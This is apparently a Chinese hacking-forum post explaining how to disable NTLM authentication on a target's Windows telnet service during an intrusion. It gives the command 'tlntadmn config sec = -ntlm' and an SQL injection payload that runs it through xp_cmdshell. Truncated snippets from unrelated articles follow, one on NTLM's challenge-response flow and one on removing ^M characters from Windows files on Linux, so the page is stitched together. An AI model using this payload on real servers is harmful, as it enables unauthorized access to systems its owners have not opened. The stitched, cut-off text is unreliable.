相信大家都對telnet比較熟悉吧。hacking的時候經常用到的系統自帶shell尤其是注射的時候,但是最討厭的就是ntlm認證了,以前大家去掉ntlm的方法一般有2種。
1 上傳ntml.exe 這種方法有很多缺點,比如:對方有防毒軟體,很多網段遮蔽了tftp.
2 直接寫入telnet的配置資訊到文字中然後在用shell執行。 這種辦法非常麻煩。
今天我給大家介紹我一直在使用的辦法,壓箱底的哦。
那就是直接執行命令:tlntadmn config sec = -ntlm
注射的話可以直接執行:;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
執行以後就去掉了該死的ntlm認證:) 趕快去試試吧。
最後祝大家聖誕快樂!!!
NTLM驗證的含義
早期的smb協議在網路上明文傳輸口令,後來出現了 lan manager challenge response 驗證機制,簡稱lm,它十分簡單以至很容易被破解,微軟隨後提出了windowsnt挑戰 響應驗證機制,即ntlm。現在已經有了更新的ntlmv2以及kerberos驗證體系。ntlm工作流程...
詳細的NTLM工作流程
ntlm工作流程是這樣的 1 客戶端首先在本地加密當前使用者的密碼成為密碼雜湊 2 客戶端向伺服器傳送自己的帳號,這個帳號是沒有經過加密的,明文直接傳輸 3 伺服器產生乙個16位的隨機數字傳送給客戶端,作為乙個 challenge 挑戰 4 客戶端再用加密後的密碼雜湊來加密這個 challenge ...
Linux下去掉 M的方法
說到 要去除 m,我們首先 必須明白 這 m從 來的。m 從 來的?windows 和 linux 裡 的乙個 差異 便是 在windows 下 換行 的表示 是用 r n 0a0d 表示的,而在linux 下,只用 n 0d 就可以表示了。因此 將 windows下的檔案 拷貝到 linux下 總...